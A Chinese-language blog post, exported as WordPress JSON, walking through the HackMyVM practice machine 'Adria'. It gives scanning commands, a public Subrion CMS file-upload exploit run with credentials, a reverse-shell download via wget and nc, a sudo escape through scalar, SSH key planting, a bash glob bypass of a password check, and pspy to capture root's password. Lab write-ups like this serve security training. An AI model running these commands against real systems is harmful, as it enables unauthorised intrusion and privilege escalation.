{"id":477,"date":"2024-06-09T10:59:13","date_gmt":"2024-06-09T02:59:13","guid":{"rendered":"http:\/\/xiyu12.top\/?p=477"},"modified":"2024-06-09T10:59:13","modified_gmt":"2024-06-09T02:59:13","slug":"adria-hmv","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=477","title":{"rendered":"Adria-HMV"},"content":{"rendered":"\n

 created by || cromiphi<\/a><\/p>\n\n\n\n

\u23f2\ufe0f Release Date \/\/ 2024-02-23<\/p>\n\n\n\n

\u2714\ufe0f MD5 \/\/ 8b0f2580ad3254763cc3acef54d7472c<\/p>\n\n\n\n

https:\/\/hackmyvm.eu\/machines\/machine.php?vm=Adria<\/a><\/p>\n\n\n\n

\u4e00\u3001\u4fe1\u606f\u6536\u96c6<\/h2>\n\n\n\n
sudo nmap -sn 192.168.130.0\/24\nsudo nmap -sT --min-rate 10000 -p-    192.168.130.159\nnmap -sCV -O -p80,22,139,445 -oN scv  192.168.130.159\nnmap --script=vuln -p 22,80,445,139 -oN vuln 192.168.130.159<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u603b\u7ed3\u4e00\u4e0b  <\/p>\n\n\n\n
\u5b58\u5728\u6709445\u548c139  \u7aef\u53e3  \u670d\u52a1\u4e3asmb<\/p>\n\n\n\n
\u5b58\u5728 \u670980\u7aef\u53e3   \u8fd0\u884chttp   <\/p>\n\n\n\n
robots.txt  –>\uff1a  \/backup\/ \/cron\/? \/front\/ \/install\/ \/panel\/ \/tmp\/  _\/updates\/<\/p>\n\n\n\n
\u8bbf\u95ee \u7f51\u9875\u6307\u5411  \u57df\u540d http:\/\/adria.hmv<\/a>  \u6dfb\u52a0\u4e00\u4e2a\u8bb0\u5f55<\/p>\n\n\n\n
echo “192.168.130.159   adria.hmv ” | sudo tee -a \/etc\/hosts<\/p>\n\n\n\n
\u626b\u63cf\u4e00\u4e0b \u76ee\u5f55<\/p>\n\n\n\n
gobuster dir -u http:\/\/192.168.130.159  --wordlist \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x .txt,.php,.html \n\n\u6709\u62a5\u9519\u4fe1\u606f  -->\uff1aError: the server returns a status code that matches the provided options for non existing urls. http:\/\/192.168.130.159\/19d1ccc7-ce6d-40b1-b3e3-99facd826dc1 => 301 (Length: 349). To continue please exclude the status code or the length\nHTTP 301 Moved Permanently \u8bf4\u660e\u8bf7\u6c42\u7684\u8d44\u6e90\u5df2\u7ecf\u88ab\u79fb\u52a8\u5230\u4e86\u7531 Location \u5934\u90e8\u6307\u5b9a\u7684 url \u4e0a\n\u91cd\u5b9a\u5411  \u52a0\u4e00\u4e2a\u53c2\u6570  -r  \u8ddf\u968f\u91cd\u5b9a\u5411\n\ngobuster dir -u http:\/\/192.168.130.159  --wordlist \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x .txt,.php,.html -r\n<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
<\/p>\n\n\n\n
\u8bbf\u95ee smb\u670d\u52a1<\/p>\n\n\n\n
smbclient -L   adria.hmv<\/p>\n\n\n\n
\u83b7\u5f97\u51ed\u8bc1<\/p>\n\n\n\n
\u4e8c\u3001\u83b7\u5f97\u7acb\u8db3\u70b9<\/h2>\n\n\n\n
\u8bbf\u95ee\u7f51\u9875<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
<\/p>\n\n\n\n
\u53d1\u73b0\u4e24\u4e2a\u767b\u9646\u70b9 \uff1a\u8fd9\u91cc\u53ef\u4ee5\u8bd5\u4e00\u4e0b  sql\u6ce8\u5165\uff0c\u4e07\u80fd\u5bc6\u7801\uff0c\u5f31\u53e3\u4ee4<\/p>\n\n\n\n
\u540c\u65f6\u9875\u9762\u4e2d\u51fa\u73b0\u4e86 Powered by Subrion CMS v4.2.1<\/p>\n\n\n\n
<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6839\u636e\u641c\u7d22  \u53d1\u73b0cms  \u5b58\u5728\u6f0f\u6d1e  \u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\uff08\u9700\u8981\u5148\u767b\u9646\uff09<\/p>\n\n\n\n
python 49876.py -u http:\/\/192.168.130.159\/panel\/ -l admin -p jojo1989<\/p>\n\n\n\n
\u901a\u8fc7\u4e0a\u4f20\u53cd\u5f39shell\u6267\u884c  \u83b7\u5f97\u4e86\u4e00\u4e2ashell<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4e09\u3001\u63d0\u6743<\/h2>\n\n\n\n
\u4f18\u5316shell \u65f6\u5361\u4f4f\u4e86<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4e0a\u4f20\u4e00\u4e2a \u53cd\u5f39shell  shell.php<\/p>\n\n\n\n
python -m http.server\nwget http:\/\/192.168.130.107:8000\/shell.php\nchmod +x shell.php \nnc -lvp 1234\nphp shell.php<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
\u91cd\u65b0\u53cd\u5f39\u56de\u6765\u4e00\u4e2ashell\uff0c\u4f18\u5316<\/p>\n\n\n\n
python3 -c \"import pty;pty.spawn('\/bin\/bash');\"\nctrl + z \nstty raw -echo;fg\nreset\nxterm-256color<\/code><\/pre>\n\n\n\n
\u83b7\u5f97\u4f18\u5316shell \uff0csudo -l <\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
sudo -u adriana \/usr\/bin\/scalar\nsudo -u adriana \/usr\/bin\/scalar help\n!\/bin\/bash<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5199\u5165\u516c\u94a5 ssh\u767b\u9646<\/p>\n\n\n\n
echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC8iMYNWQbDmMJB\/ej90Sf8D2LepvpjtDJPX8G0s1m4HWNU2U7VwtSPWl1fKoI7aU0YNU32uHnD7B0ReQIaTXt6PgatSXRAmHJc+lJv1tEBWyfuJghyE9VacQ== user@user\" > .ssh\/authorized_keys\n\nssh adriana@192.168.130.107<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
#!\/bin\/bash\n\nPASSWORD=$(\/usr\/bin\/cat \/root\/pass)\n\nread -ep \"Password: \" USER_PASS\n\nif [[ $PASSWORD == $USER_PASS ]] ; then\n\n  \/usr\/bin\/echo \"Authorized access\"\n  \/usr\/bin\/sleep 1\n  \/usr\/bin\/zip -r -e -P \"$PASSWORD\" \/opt\/backup.zip \/var\/www\/html\nelse\n  \/usr\/bin\/echo \"Access denied\"\n  exit 1\nfi\n<\/code><\/pre>\n\n\n\n
[[ $PASSWORD == $USER_PASS ]]  \u5f53\u8f93\u5165\u7684\u503c \u5728\u5224\u65ad\u7684\u53f3\u8fb9\u65f6  \u8f93\u5165\u4e00\u4e2a*  \u53ef\u4ee5\u7ed5\u8fc7\u5224\u65ad<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\/usr\/bin\/zip -r -e -P “$PASSWORD” \/opt\/backup.zip \/var\/www\/html  \u5f53\u8fd0\u884c\u8fd9\u6761\u8bed\u53e5\u65f6  \u4f1a\u8ba9\u6211\u4eec\u5f97\u5230 $PASSWORD<\/p>\n\n\n\n
\u4e0a\u4f20\u4e00\u4e2apspy64<\/p>\n\n\n\n
python -m http.server\nwget http:\/\/192.168.130.107:8000\/pspy64\nchmod +x pspy64 \n.\/pspy64 -i 1000 -p<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
su root<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
 created by || cromiphi \u23f2\ufe0f Release Date \/\/&nb […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[17,34],"class_list":["post-477","post","type-post","status-publish","format-standard","hentry","category-target-aircraft","tag-301-moved-permanently","tag-gobuster-r-"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/477","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=477"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/477\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=477"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=477"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=477"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}